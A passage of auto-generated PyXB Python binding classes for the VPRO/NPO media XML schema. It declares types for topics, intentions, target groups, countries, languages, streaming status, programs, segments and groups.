_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'topicsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 989, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}topic uses Python identifier topic
__topic = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'topic'), 'topic', '__urnvpromedia2009_topicsType_urnvpromedia2009topic', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6), )
topic = property(__topic.value, __topic.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_topicsType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 993, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 993, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__topic.name() : __topic
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.topicsType = topicsType
Namespace.addCategoryObject('typeBinding', 'topicsType', topicsType)
# Complex type {urn:vpro:media:2009}topicType with content type ELEMENT_ONLY
class topicType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}topicType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'topicType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 996, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}name uses Python identifier name
__name = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'name'), 'name', '__urnvpromedia2009_topicType_urnvpromedia2009name', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 998, 6), )
name = property(__name.value, __name.set, None, None)
# Element {urn:vpro:media:2009}scopeNote uses Python identifier scopeNote
__scopeNote = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), 'scopeNote', '__urnvpromedia2009_topicType_urnvpromedia2009scopeNote', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6), )
scopeNote = property(__scopeNote.value, __scopeNote.set, None, None)
# Attribute gtaaUri uses Python identifier gtaaUri
__gtaaUri = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaUri'), 'gtaaUri', '__urnvpromedia2009_topicType_gtaaUri', pyxb.binding.datatypes.string)
__gtaaUri._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1001, 4)
__gtaaUri._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1001, 4)
gtaaUri = property(__gtaaUri.value, __gtaaUri.set, None, None)
# Attribute gtaaStatus uses Python identifier gtaaStatus
__gtaaStatus = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'gtaaStatus'), 'gtaaStatus', '__urnvpromedia2009_topicType_gtaaStatus', _module_typeBindings.gtaaStatusType)
__gtaaStatus._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1002, 4)
__gtaaStatus._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1002, 4)
gtaaStatus = property(__gtaaStatus.value, __gtaaStatus.set, None, None)
_ElementMap.update({
__name.name() : __name,
__scopeNote.name() : __scopeNote
})
_AttributeMap.update({
__gtaaUri.name() : __gtaaUri,
__gtaaStatus.name() : __gtaaStatus
})
_module_typeBindings.topicType = topicType
Namespace.addCategoryObject('typeBinding', 'topicType', topicType)
# Complex type {urn:vpro:media:2009}intentionType with content type ELEMENT_ONLY
class intentionType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}intentionType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'intentionType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1005, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}intention uses Python identifier intention
__intention = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'intention'), 'intention', '__urnvpromedia2009_intentionType_urnvpromedia2009intention', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6), )
intention = property(__intention.value, __intention.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_intentionType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1009, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1009, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__intention.name() : __intention
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.intentionType = intentionType
Namespace.addCategoryObject('typeBinding', 'intentionType', intentionType)
# Complex type {urn:vpro:media:2009}targetGroupsType with content type ELEMENT_ONLY
class targetGroupsType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}targetGroupsType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'targetGroupsType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1012, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {urn:vpro:media:2009}targetGroup uses Python identifier targetGroup
__targetGroup = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'targetGroup'), 'targetGroup', '__urnvpromedia2009_targetGroupsType_urnvpromedia2009targetGroup', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6), )
targetGroup = property(__targetGroup.value, __targetGroup.set, None, None)
# Attribute owner uses Python identifier owner
__owner = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'owner'), 'owner', '__urnvpromedia2009_targetGroupsType_owner', _ImportedBinding_npoapi_xml_shared.ownerTypeEnum)
__owner._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1016, 4)
__owner._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1016, 4)
owner = property(__owner.value, __owner.set, None, None)
_ElementMap.update({
__targetGroup.name() : __targetGroup
})
_AttributeMap.update({
__owner.name() : __owner
})
_module_typeBindings.targetGroupsType = targetGroupsType
Namespace.addCategoryObject('typeBinding', 'targetGroupsType', targetGroupsType)
# Complex type {urn:vpro:media:2009}countryType with content type SIMPLE
class countryType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}countryType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'countryType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1188, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__urnvpromedia2009_countryType_code', _module_typeBindings.countryCodeType)
__code._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1191, 8)
__code._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1191, 8)
code = property(__code.value, __code.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code
})
_module_typeBindings.countryType = countryType
Namespace.addCategoryObject('typeBinding', 'countryType', countryType)
# Complex type {urn:vpro:media:2009}languageType with content type SIMPLE
class languageType (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}languageType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'languageType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1208, 2)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.string
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__urnvpromedia2009_languageType_code', _module_typeBindings.languageCodeType)
__code._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1211, 8)
__code._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1211, 8)
code = property(__code.value, __code.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code
})
_module_typeBindings.languageType = languageType
Namespace.addCategoryObject('typeBinding', 'languageType', languageType)
# Complex type {urn:vpro:media:2009}streamingStatus with content type EMPTY
class streamingStatus_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {urn:vpro:media:2009}streamingStatus with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'streamingStatus')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3239, 3)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute withDrm uses Python identifier withDrm
__withDrm = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'withDrm'), 'withDrm', '__urnvpromedia2009_streamingStatus__withDrm', _module_typeBindings.streamingStatusValue)
__withDrm._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3241, 4)
__withDrm._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3241, 4)
withDrm = property(__withDrm.value, __withDrm.set, None, None)
# Attribute withoutDrm uses Python identifier withoutDrm
__withoutDrm = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'withoutDrm'), 'withoutDrm', '__urnvpromedia2009_streamingStatus__withoutDrm', _module_typeBindings.streamingStatusValue)
__withoutDrm._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3242, 4)
__withoutDrm._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 3242, 4)
withoutDrm = property(__withoutDrm.value, __withoutDrm.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__withDrm.name() : __withDrm,
__withoutDrm.name() : __withoutDrm
})
_module_typeBindings.streamingStatus_ = streamingStatus_
Namespace.addCategoryObject('typeBinding', 'streamingStatus', streamingStatus_)
# Complex type {urn:vpro:media:2009}programType with content type ELEMENT_ONLY
class programType (baseMediaType):
"""Complex type {urn:vpro:media:2009}programType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'programType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 87, 2)
_ElementMap = baseMediaType._ElementMap.copy()
_AttributeMap = baseMediaType._AttributeMap.copy()
# Base type is baseMediaType
# Element {urn:vpro:media:2009}scheduleEvents uses Python identifier scheduleEvents
__scheduleEvents = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvents'), 'scheduleEvents', '__urnvpromedia2009_programType_urnvpromedia2009scheduleEvents', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10), )
scheduleEvents = property(__scheduleEvents.value, __scheduleEvents.set, None, None)
# Element {urn:vpro:media:2009}episodeOf uses Python identifier episodeOf
__episodeOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), 'episodeOf', '__urnvpromedia2009_programType_urnvpromedia2009episodeOf', True, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10), )
episodeOf = property(__episodeOf.value, __episodeOf.set, None, "\n A program (only if its type is 'BROADCAST') can be an episode of a group of type 'SERIES' or 'SEASON'.\n ")
# Element {urn:vpro:media:2009}segments uses Python identifier segments
__segments = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segments'), 'segments', '__urnvpromedia2009_programType_urnvpromedia2009segments', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10), )
segments = property(__segments.value, __segments.set, None, None)
# Element crid ({urn:vpro:media:2009}crid) inherited from {urn:vpro:media:2009}baseMediaType
# Element broadcaster ({urn:vpro:media:2009}broadcaster) inherited from {urn:vpro:media:2009}baseMediaType
# Element portal ({urn:vpro:media:2009}portal) inherited from {urn:vpro:media:2009}baseMediaType
# Element exclusive ({urn:vpro:media:2009}exclusive) inherited from {urn:vpro:media:2009}baseMediaType
# Element region ({urn:vpro:media:2009}region) inherited from {urn:vpro:media:2009}baseMediaType
# Element title ({urn:vpro:media:2009}title) inherited from {urn:vpro:media:2009}baseMediaType
# Element description ({urn:vpro:media:2009}description) inherited from {urn:vpro:media:2009}baseMediaType
# Element genre ({urn:vpro:media:2009}genre) inherited from {urn:vpro:media:2009}baseMediaType
# Element tag ({urn:vpro:media:2009}tag) inherited from {urn:vpro:media:2009}baseMediaType
# Element intentions ({urn:vpro:media:2009}intentions) inherited from {urn:vpro:media:2009}baseMediaType
# Element targetGroups ({urn:vpro:media:2009}targetGroups) inherited from {urn:vpro:media:2009}baseMediaType
# Element geoLocations ({urn:vpro:media:2009}geoLocations) inherited from {urn:vpro:media:2009}baseMediaType
# Element topics ({urn:vpro:media:2009}topics) inherited from {urn:vpro:media:2009}baseMediaType
# Element source ({urn:vpro:media:2009}source) inherited from {urn:vpro:media:2009}baseMediaType
# Element country ({urn:vpro:media:2009}country) inherited from {urn:vpro:media:2009}baseMediaType
# Element language ({urn:vpro:media:2009}language) inherited from {urn:vpro:media:2009}baseMediaType
# Element isDubbed ({urn:vpro:media:2009}isDubbed) inherited from {urn:vpro:media:2009}baseMediaType
# Element availableSubtitles ({urn:vpro:media:2009}availableSubtitles) inherited from {urn:vpro:media:2009}baseMediaType
# Element avAttributes ({urn:vpro:media:2009}avAttributes) inherited from {urn:vpro:media:2009}baseMediaType
# Element releaseYear ({urn:vpro:media:2009}releaseYear) inherited from {urn:vpro:media:2009}baseMediaType
# Element duration ({urn:vpro:media:2009}duration) inherited from {urn:vpro:media:2009}baseMediaType
# Element credits ({urn:vpro:media:2009}credits) inherited from {urn:vpro:media:2009}baseMediaType
# Element award ({urn:vpro:media:2009}award) inherited from {urn:vpro:media:2009}baseMediaType
# Element descendantOf ({urn:vpro:media:2009}descendantOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element memberOf ({urn:vpro:media:2009}memberOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element ageRating ({urn:vpro:media:2009}ageRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element contentRating ({urn:vpro:media:2009}contentRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element email ({urn:vpro:media:2009}email) inherited from {urn:vpro:media:2009}baseMediaType
# Element website ({urn:vpro:media:2009}website) inherited from {urn:vpro:media:2009}baseMediaType
# Element twitter ({urn:vpro:media:2009}twitter) inherited from {urn:vpro:media:2009}baseMediaType
# Element teletext ({urn:vpro:media:2009}teletext) inherited from {urn:vpro:media:2009}baseMediaType
# Element prediction ({urn:vpro:media:2009}prediction) inherited from {urn:vpro:media:2009}baseMediaType
# Element locations ({urn:vpro:media:2009}locations) inherited from {urn:vpro:media:2009}baseMediaType
# Element relation ({urn:vpro:media:2009}relation) inherited from {urn:vpro:media:2009}baseMediaType
# Element images ({urn:vpro:media:2009}images) inherited from {urn:vpro:media:2009}baseMediaType
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_programType_type', _module_typeBindings.programTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 107, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 107, 8)
type = property(__type.value, __type.set, None, '\n The type of this program (e.g. BROADCAST, TRACK, CLIP)\n ')
# Attribute mid inherited from {urn:vpro:media:2009}baseMediaType
# Attribute avType inherited from {urn:vpro:media:2009}baseMediaType
# Attribute sortDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute embeddable inherited from {urn:vpro:media:2009}baseMediaType
# Attribute hasSubtitles inherited from {urn:vpro:media:2009}baseMediaType
# Attribute mergedTo inherited from {urn:vpro:media:2009}baseMediaType
# Attribute urn inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStart inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStop inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute creationDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute lastModified inherited from {urn:vpro:media:2009}baseMediaType
# Attribute workflow inherited from {urn:vpro:media:2009}baseMediaType
_ElementMap.update({
__scheduleEvents.name() : __scheduleEvents,
__episodeOf.name() : __episodeOf,
__segments.name() : __segments
})
_AttributeMap.update({
__type.name() : __type
})
_module_typeBindings.programType = programType
Namespace.addCategoryObject('typeBinding', 'programType', programType)
# Complex type {urn:vpro:media:2009}broadcasterType with content type SIMPLE
class broadcasterType (organizationType):
"""Complex type {urn:vpro:media:2009}broadcasterType with content type SIMPLE"""
_TypeDefinition = pyxb.binding.datatypes.string
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_SIMPLE
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'broadcasterType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 441, 2)
_ElementMap = organizationType._ElementMap.copy()
_AttributeMap = organizationType._AttributeMap.copy()
# Base type is organizationType
# Attribute id inherited from {urn:vpro:media:2009}organizationType
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.broadcasterType = broadcasterType
Namespace.addCategoryObject('typeBinding', 'broadcasterType', broadcasterType)
# Complex type {urn:vpro:media:2009}segmentType with content type ELEMENT_ONLY
class segmentType (baseMediaType):
"""Complex type {urn:vpro:media:2009}segmentType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'segmentType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 629, 2)
_ElementMap = baseMediaType._ElementMap.copy()
_AttributeMap = baseMediaType._AttributeMap.copy()
# Base type is baseMediaType
# Element crid ({urn:vpro:media:2009}crid) inherited from {urn:vpro:media:2009}baseMediaType
# Element broadcaster ({urn:vpro:media:2009}broadcaster) inherited from {urn:vpro:media:2009}baseMediaType
# Element portal ({urn:vpro:media:2009}portal) inherited from {urn:vpro:media:2009}baseMediaType
# Element exclusive ({urn:vpro:media:2009}exclusive) inherited from {urn:vpro:media:2009}baseMediaType
# Element region ({urn:vpro:media:2009}region) inherited from {urn:vpro:media:2009}baseMediaType
# Element title ({urn:vpro:media:2009}title) inherited from {urn:vpro:media:2009}baseMediaType
# Element description ({urn:vpro:media:2009}description) inherited from {urn:vpro:media:2009}baseMediaType
# Element genre ({urn:vpro:media:2009}genre) inherited from {urn:vpro:media:2009}baseMediaType
# Element tag ({urn:vpro:media:2009}tag) inherited from {urn:vpro:media:2009}baseMediaType
# Element intentions ({urn:vpro:media:2009}intentions) inherited from {urn:vpro:media:2009}baseMediaType
# Element targetGroups ({urn:vpro:media:2009}targetGroups) inherited from {urn:vpro:media:2009}baseMediaType
# Element geoLocations ({urn:vpro:media:2009}geoLocations) inherited from {urn:vpro:media:2009}baseMediaType
# Element topics ({urn:vpro:media:2009}topics) inherited from {urn:vpro:media:2009}baseMediaType
# Element source ({urn:vpro:media:2009}source) inherited from {urn:vpro:media:2009}baseMediaType
# Element country ({urn:vpro:media:2009}country) inherited from {urn:vpro:media:2009}baseMediaType
# Element language ({urn:vpro:media:2009}language) inherited from {urn:vpro:media:2009}baseMediaType
# Element isDubbed ({urn:vpro:media:2009}isDubbed) inherited from {urn:vpro:media:2009}baseMediaType
# Element availableSubtitles ({urn:vpro:media:2009}availableSubtitles) inherited from {urn:vpro:media:2009}baseMediaType
# Element avAttributes ({urn:vpro:media:2009}avAttributes) inherited from {urn:vpro:media:2009}baseMediaType
# Element releaseYear ({urn:vpro:media:2009}releaseYear) inherited from {urn:vpro:media:2009}baseMediaType
# Element duration ({urn:vpro:media:2009}duration) inherited from {urn:vpro:media:2009}baseMediaType
# Element credits ({urn:vpro:media:2009}credits) inherited from {urn:vpro:media:2009}baseMediaType
# Element award ({urn:vpro:media:2009}award) inherited from {urn:vpro:media:2009}baseMediaType
# Element descendantOf ({urn:vpro:media:2009}descendantOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element memberOf ({urn:vpro:media:2009}memberOf) inherited from {urn:vpro:media:2009}baseMediaType
# Element ageRating ({urn:vpro:media:2009}ageRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element contentRating ({urn:vpro:media:2009}contentRating) inherited from {urn:vpro:media:2009}baseMediaType
# Element email ({urn:vpro:media:2009}email) inherited from {urn:vpro:media:2009}baseMediaType
# Element website ({urn:vpro:media:2009}website) inherited from {urn:vpro:media:2009}baseMediaType
# Element twitter ({urn:vpro:media:2009}twitter) inherited from {urn:vpro:media:2009}baseMediaType
# Element teletext ({urn:vpro:media:2009}teletext) inherited from {urn:vpro:media:2009}baseMediaType
# Element prediction ({urn:vpro:media:2009}prediction) inherited from {urn:vpro:media:2009}baseMediaType
# Element locations ({urn:vpro:media:2009}locations) inherited from {urn:vpro:media:2009}baseMediaType
# Element relation ({urn:vpro:media:2009}relation) inherited from {urn:vpro:media:2009}baseMediaType
# Element images ({urn:vpro:media:2009}images) inherited from {urn:vpro:media:2009}baseMediaType
# Element {urn:vpro:media:2009}segmentOf uses Python identifier segmentOf
__segmentOf = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), 'segmentOf', '__urnvpromedia2009_segmentType_urnvpromedia2009segmentOf', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 633, 10), )
segmentOf = property(__segmentOf.value, __segmentOf.set, None, None)
# Element {urn:vpro:media:2009}start uses Python identifier start
__start = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'start'), 'start', '__urnvpromedia2009_segmentType_urnvpromedia2009start', False, pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 634, 10), )
start = property(__start.value, __start.set, None, None)
# Attribute mid inherited from {urn:vpro:media:2009}baseMediaType
# Attribute avType inherited from {urn:vpro:media:2009}baseMediaType
# Attribute sortDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute embeddable inherited from {urn:vpro:media:2009}baseMediaType
# Attribute hasSubtitles inherited from {urn:vpro:media:2009}baseMediaType
# Attribute mergedTo inherited from {urn:vpro:media:2009}baseMediaType
# Attribute midRef uses Python identifier midRef
__midRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'midRef'), 'midRef', '__urnvpromedia2009_segmentType_midRef', _module_typeBindings.midType, required=True)
__midRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 636, 8)
__midRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 636, 8)
midRef = property(__midRef.value, __midRef.set, None, None)
# Attribute urnRef uses Python identifier urnRef
__urnRef = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'urnRef'), 'urnRef', '__urnvpromedia2009_segmentType_urnRef', pyxb.binding.datatypes.anyURI, required=True)
__urnRef._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 637, 8)
__urnRef._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 637, 8)
urnRef = property(__urnRef.value, __urnRef.set, None, None)
# Attribute type uses Python identifier type
__type = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'type'), 'type', '__urnvpromedia2009_segmentType_type', _module_typeBindings.segmentTypeEnum, required=True)
__type._DeclarationLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 638, 8)
__type._UseLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 638, 8)
type = property(__type.value, __type.set, None, None)
# Attribute urn inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStart inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishStop inherited from {urn:vpro:media:2009}baseMediaType
# Attribute publishDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute creationDate inherited from {urn:vpro:media:2009}baseMediaType
# Attribute lastModified inherited from {urn:vpro:media:2009}baseMediaType
# Attribute workflow inherited from {urn:vpro:media:2009}baseMediaType
_ElementMap.update({
__segmentOf.name() : __segmentOf,
__start.name() : __start
})
_AttributeMap.update({
__midRef.name() : __midRef,
__urnRef.name() : __urnRef,
__type.name() : __type
})
_module_typeBindings.segmentType = segmentType
Namespace.addCategoryObject('typeBinding', 'segmentType', segmentType)
# Complex type {urn:vpro:media:2009}groupType with content type ELEMENT_ONLY
class groupType (baseMediaType):
"""Complex type {urn:vpro:media:2009}groupType with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'groupType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 837, 2)
_ElementMap = baseMediaType._ElementMap.copy()
_AttributeMap = baseMediaType._AttributeMap.copy()
# Base type is baseMediaType
# Element crid ({urn:vpro:media:2009}crid) inherited from {urn:vpro:media:2009}baseMediaType
# Element broadcaster ({urn:vpro:media:2009}broadcaster) inherited from {urn:vpro:media:2009}baseMediaType
# Element portal ({urn:vpro:media:2009}portal) inherited from {urn:vpro:media:2009}baseMediaType
# Element exclusive ({urn:vpro:media:2009}exclusive) inherited from {urn:vpro:media:2009}baseMediaType
# Element region ({urn:vpro:media:2009}region) inherited from {urn:vpro:media:2009}baseMediaType
# Element title ({urn:vpro:media:2009}title) inherited from {urn:vpro:media:2009}baseMediaType
# Element description ({urn:vpro:media:2009}description) inherited from {urn:vpro:media:2009}baseMediaType
# Element genre ({urn:vpro:media:2009}genre) inherited from {urn:vpro:media:2009}baseMediaType
# Element tag ({urn:vpro:media:2009}tag) inherited from {urn:vpro:media:2009}baseMediaType
# Element intentions ({urn:vpro:media:2009}intentions) inherited from {urn:vpro:media:2009}baseMediaType
# Element targetGroups ({urn:vpro:media:2009}targetGroups) inherited from {urn:vpro:media:2009}baseMediaType
# Element geoLocations ({urn:vpro:media:2009}geoLocations) inherited from {urn:vpro:media:2009}baseMediaType
# Element topics ({urn:vpro:media:2009}topics) inherited from {urn:vpro:media:2009}baseMediaType
# Element source ({urn:vpro:media:2009}source) inherited from {urn:vpro:media:2009}baseMediaType
# Element country ({urn:vpro:media:2009}country) inherited from {urn:vpro:media:2009}baseMediaType
# Element language ({urn:vpro:media:2009}language) inherited from {urn:vpro:media:2009}baseMediaType
# Element isDubbed ({urn:vpro:media:2009}isDubbed) inherited from {urn:vpro:media:2009}baseMediaType
# Element availableSubtitles ({urn:vpro:media:2009}availableSubtitles) inherited from {urn:vpro:media:2009}baseMediaType
# Element avAttributes ({urn:vpro:media:2009}avAttributes) inherited from {urn:vpro:media:2009}baseMediaType
